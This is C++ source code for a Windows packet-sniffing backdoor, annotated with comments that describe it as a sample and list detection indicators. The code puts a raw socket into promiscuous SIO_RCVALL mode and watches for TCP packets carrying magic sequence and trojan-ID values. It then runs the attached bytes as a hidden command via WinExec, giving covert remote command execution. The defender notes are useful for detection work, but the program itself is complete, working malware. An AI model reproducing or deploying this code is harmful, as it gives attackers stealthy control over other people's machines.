#include "mysock.h"
#define MAX_PACKET_SIZE 65536
#define SEQ_IDENTITY 12345
#define TROJAN_ID_IDENTITY 6789
//trojan packet header
// Marker trailer that DecodeData() expects directly after the IP and TCP
// headers of a captured packet. Its two fields are the second and third of
// the three trigger checks in DecodeData(); the command bytes follow it.
typedef struct trojanhdr
{
unsigned long trojan_id; // marker; compared (after a 16-bit cast + ntohs) with TROJAN_ID_IDENTITY
unsigned short trojan_len; // number of command bytes that follow this header (host order as used)
}TROJANHEADER, *PTROJANHEADER;
//get local ip
// Resolve the machine's own host name and return one of its IPv4 addresses
// as the value inet_addr() produces for the dotted string.
//
// Returns 0 when gethostname() fails. Because the loop overwrites szLocalIP
// on every iteration, the address returned is the LAST entry of
// gethostbyname()'s h_addr_list. If the lookup yields no address, szLocalIP
// stays empty and whatever inet_addr("") returns is passed back unchanged.
// Caller: SniffThread() binds its raw socket to this value.
unsigned long GetLocalIP()
{
char szLocalIP[20] = {0};
char szHostName[128+1] = "\0";
hostent *phe;
int i;
if( gethostname(szHostName, 128 ) == 0 ) {
// Get host adresses
phe = gethostbyname(szHostName);
// Format each address; only the last one survives in szLocalIP.
for( i = 0; phe != NULL && phe->h_addr_list[i]!= NULL; i++ )
{
sprintf(szLocalIP, "%d.%d.%d.%d",
(UINT)((UCHAR*)phe->h_addr_list[i])[0],
(UINT)((UCHAR*)phe->h_addr_list[i])[1],
(UINT)((UCHAR*)phe->h_addr_list[i])[2],
(UINT)((UCHAR*)phe->h_addr_list[i])[3]);
}
}
else
return 0;
return inet_addr(szLocalIP);
}
// Inspect one captured packet (pBuffer = IP header, then TCP header, then
// payload) for the trigger pattern and, on a match, run the payload as a
// hidden command line via WinExec().
//
// Trigger conditions, in order (all three must hold; each is a usable
// network-detection indicator for this sample):
//   1. IP protocol field == IPPROTO_TCP
//   2. TCP sequence field, cast to unsigned short and byte-swapped with
//      ntohs(), == SEQ_IDENTITY (12345)
//   3. trojan_id, cast the same way, == TROJAN_ID_IDENTITY (6789)
// The casts mean only part of each 32-bit field takes part in the compare;
// which bytes that is depends on the seq field's declared type in mysock.h,
// which is not visible here. IPHEADER/TCPHEADER/PIPHEADER/PTCPHEADER are also
// assumed to come from mysock.h (not shown).
//
// Returns -1 when any check fails or trojan_len is 0, otherwise 0 regardless
// of whether WinExec() succeeded. The buffer is assumed to be large enough to
// hold all three headers; SniffThread() only forwards packets of >= 46 bytes.
//
// Host-detection note: the observable behaviour is a process that holds a
// SIO_RCVALL raw socket (see SniffThread) spawning child processes with
// SW_HIDE via WinExec.
int DecodeData(char* pBuffer)
{
PIPHEADER pIPHeader = (PIPHEADER)pBuffer;
PTCPHEADER pTCPHeader = (PTCPHEADER)(pBuffer + sizeof(IPHEADER));
PTROJANHEADER pTrojanHeader = (PTROJANHEADER)(pBuffer + sizeof(IPHEADER) + sizeof(TCPHEADER));
//check tcp packet
if (pIPHeader->proto != IPPROTO_TCP)
return -1;
//check seq
if (ntohs((unsigned short)(pTCPHeader->seq)) != SEQ_IDENTITY)
return -1;
//check ident
if (ntohs((unsigned short)(pTrojanHeader->trojan_id)) != TROJAN_ID_IDENTITY)
return -1;
//command length -- taken from the packet as-is, no byte swap
unsigned short cmdlen = pTrojanHeader->trojan_len;
if (0 == cmdlen)
return -1;
//printf("OK!\n"); //it is the packet we want!
// Copy the command bytes that follow the TROJANHEADER into a NUL-terminated string.
char * pCommand = new char[cmdlen + 1];
memset(pCommand, 0, cmdlen + 1);
memcpy(pCommand, pBuffer + sizeof(IPHEADER) + sizeof(TCPHEADER) + sizeof(TROJANHEADER), cmdlen);
//execute command (hidden window)
int nRet = WinExec(pCommand, SW_HIDE);
// WinExec reports success with a value greater than 31; the branch is empty,
// so nothing is ever sent back to the sender.
if (nRet > 31)
{
//WinExec Successfully!
//return the message we want...
}
return 0;
}
// Open a raw IP socket bound to the local address, switch it to SIO_RCVALL
// (receive every IP packet the interface sees) and loop forever handing
// each captured packet to DecodeData().
//
// Returns -1 after printing the Winsock error if socket(), bind(), WSAIoctl()
// or recv() fails; the trailing "return 0" is only reached if the while(1)
// loop ends, which it never does without returning from inside it.
//
// Defender notes: SIO_RCVALL on a raw socket is a privileged, unusual
// operation for ordinary software and is a good host-based indicator; on the
// wire this sample never sends anything, it only listens.
int SniffThread()
{
int nRet;
SOCKADDR_IN addr_in;
SOCKET rawSocket;
DWORD dwBufferLen[10]; // output buffer for WSAIoctl; contents are never read
DWORD dwBufferInLen = 1; // input value 1 = turn SIO_RCVALL on
DWORD dwBytesReturned = 0;
//create a raw socket
rawSocket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (INVALID_SOCKET == rawSocket)
{
printf("socket error : %d\n",WSAGetLastError());
closesocket(rawSocket);
return -1;
}
// Bind to the address GetLocalIP() chose (0 if host-name resolution failed).
addr_in.sin_family = AF_INET;
addr_in.sin_port = INADDR_ANY;
addr_in.sin_addr.S_un.S_addr = GetLocalIP();
nRet = bind(rawSocket, (struct sockaddr*)&addr_in, sizeof(addr_in));
if (SOCKET_ERROR == nRet)
{
printf("bind error : %d\n", WSAGetLastError());
closesocket(rawSocket);
return -1;
}
//socket for sniffer: enable SIO_RCVALL so all IP traffic on the interface is delivered here
nRet = WSAIoctl(rawSocket,
SIO_RCVALL,
&dwBufferInLen,
sizeof(dwBufferInLen),
&dwBufferLen,
sizeof(dwBufferLen),
&dwBytesReturned,
NULL,
NULL);
if (SOCKET_ERROR == nRet)
{
printf("wsaioctl error : %d\n", WSAGetLastError());
closesocket(rawSocket);
return -1;
}
//start sniffing
char* pBuffer = new char[MAX_PACKET_SIZE];
while(1)
{
memset(pBuffer, 0, MAX_PACKET_SIZE);
nRet = recv(rawSocket, pBuffer, MAX_PACKET_SIZE, 0);
if (SOCKET_ERROR == nRet)
{
printf("recv error : %d\n", WSAGetLastError());
free(pBuffer);
closesocket(rawSocket);
return -1;
}
// Packets shorter than 46 bytes are skipped without being decoded.
if (nRet < 46)
continue;
//decode the data (return value ignored)
DecodeData(pBuffer);
}
// Not reachable: the loop above only exits via return.
free(pBuffer);
closesocket(rawSocket);
return 0;
}
// Entry point: initialise Winsock 2.2, run the sniffer loop, then clean up.
// argc/argv are unused. SniffThread() only returns on a socket error, so
// WSACleanup() and "return 0" run only after such an error.
int main(int argc, char* argv[])
{
WSADATA WSAData;
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0 )
{
printf("WSAStartup Error:%d\n", WSAGetLastError());
return -1;
}
//start sniffer (blocks until a socket error occurs)
SniffThread();
//clean up
WSACleanup();
return 0;
}